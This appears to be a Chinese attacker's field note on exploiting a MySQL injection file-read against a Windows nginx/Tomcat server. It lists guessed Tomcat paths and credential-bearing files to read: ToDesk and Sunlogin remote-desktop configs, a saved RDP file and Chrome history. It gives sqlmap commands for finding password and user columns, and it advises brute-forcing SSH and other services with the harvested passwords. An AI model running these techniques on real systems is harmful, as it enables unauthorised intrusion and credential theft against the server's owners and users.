mysql注入能读文件,配合物理路径写文件的时候。
有时候能读能写
有时候能读不能写
读又分目标windows和linux,linux比较好办,
遇到个windows的,nignx + tomcat的。
nginx的配置文件读到了,但是不解析,尝试了各种组合找tomcat配置文件均没有成功。
1. 因为不是php 所以phpinfo不考虑。
2. tomcat页面就一个404页面,不报错不显示完整路径,所以tomcat还是找不到。上传长文件linux爆出物理路径还是有希望的
3. 读windows索引文件,成功率不大
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
还不如读 Everything.exe 索引靠谱
%LOCALAPPDATA%\Everything\Everything.db
还是没读到,
linux可以读系统环境变量.
/etc/profile
很可能读到tomcat安装路径,然后补充路径读网站路径
/conf/server.xml
windows 尝试了读,没有读到
%CATALINA_BASE%
%CATALINA_HOME%
%TOMCAT_HOME%
windows和linux环境下(最好是先看一下目标服务器tomcat版本)
C:\Apache Tomcat\
C:\Apache Tomcat-8.0.53\
C:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
C:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
C:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
C:\apache-tomcat-8.0.53\
C:\ComputerLearning\tomcat8.0.53 \bin
C:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
C:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
C:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53
C:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
C:\Tomcat\
C:\tomcat\apache-tomcat-8.0.53 \
C:\tomcat\apache-tomcat-8.0.53\
C:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
C:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
C:\tomcat-8.0.53\
D:\Apache Tomcat\
D:\Apache Tomcat-8.0.53\
D:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
D:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
D:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
D:\apache-tomcat-8.0.53\
D:\ComputerLearning\tomcat8.0.53 \bin
D:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
D:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
D:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53
D:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
D:\Tomcat\
D:\tomcat\apache-tomcat-8.0.53 \
D:\tomcat\apache-tomcat-8.0.53\
D:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
D:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
D:\tomcat-8.0.53\
E:\Apache Tomcat\
E:\Apache Tomcat-8.0.53\
E:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
E:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
E:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
E:\apache-tomcat-8.0.53\
E:\ComputerLearning\tomcat8.0.53 \bin
E:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
E:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
E:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53
E:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
E:\Tomcat\
E:\tomcat\apache-tomcat-8.0.53 \
E:\tomcat\apache-tomcat-8.0.53\
E:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
E:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
E:\tomcat-8.0.53\
F:\Apache Tomcat\
F:\Apache Tomcat-8.0.53\
F:\apache\apache-tomcat-8.0.53 -windows-x64\apache-tomcat-8.0.53 \
F:\apache\apache-tomcat-8.0.53-windows-x64\apache-tomcat-8.0.53\
F:\apache-tomcat-8.0.53 -windows-x86\apache-tomcat-8.0.53\
F:\apache-tomcat-8.0.53\
F:\ComputerLearning\tomcat8.0.53 \bin
F:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
F:\Program Files\Apache Software Foundation\Tomcat 8.0.53\
F:\SoftMgr\apache-tomcat-8.0.53 \apache-tomcat-8.0.53
F:\SoftMgr\apache-tomcat-8.0.53\apache-tomcat-8.0.53\
F:\Tomcat\
F:\tomcat\apache-tomcat-8.0.53 \
F:\tomcat\apache-tomcat-8.0.53\
F:\tomcat\tomcat-8.0.53 \apache-tomcat-8.0.53 \
F:\tomcat\tomcat-8.0.53\apache-tomcat-8.0.53\
F:\tomcat-8.0.53\
tomcat一些安装路径:
/home/username/tomcat/
/home/username/tomcat-8.0.53/
/opt/tomcat/
/opt/tomcat/apache-tomcat-8.0.53/
/opt/tomcat-8.0.53/
/usr/local/apache-tomcat-8.0.53/
/usr/local/tomcat/
/usr/local/tomcat-8.0.53/
/www/server/tomcat/
/www/server/tomcat-8.0.53/
还是读不到,尝试了读todesk和向日葵
C:\Program Files (x86)\ToDesk\config.ini
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
C:\Program Files\ToDesk\config.ini
C:\ProgramData\Oray\SunloginClient\config.ini
C:\ProgramData\Oray\SunloginClient\sys_config.ini
C:\ProgramData\Oray\SunloginClientLite\config.ini
C:\ProgramData\ToDesk\config.ini
还是没有读到,
还可以尝试读:rdp哦
C:\Users\Administrator\Documents\Default.rdp
我这个读到了,但是那个吊毛没有保存连接密码
尝试读浏览器历史:谷歌浏览器
C:\Users\administrator\AppData\Local\Google\Chrome\User Data\Default\History
它是一个SQLite数据库文件
也没读到东西,还可以尝试读桌面的一些可能快捷方式。
目标开了mysql,就不用这么麻烦了,当然ssh也会要去爆一下,
然后子域名资产的 其他服务器端口,根据mysql密码 还有后台账号,也可以生成社工点去爆一下。
数据库里面
sqlmap.py -r a.txt --search -T admin、user、config
sqlmap.py -r a.txt --search -C password、username、userpwd、user、pass
sqlmap.py -r a.txt --search -C config、menu、list 这个很可能会泄露邮箱和路径什么的
sqlmap.py -r a.txt --search -C filename、file、name 这个很可能存放物理路径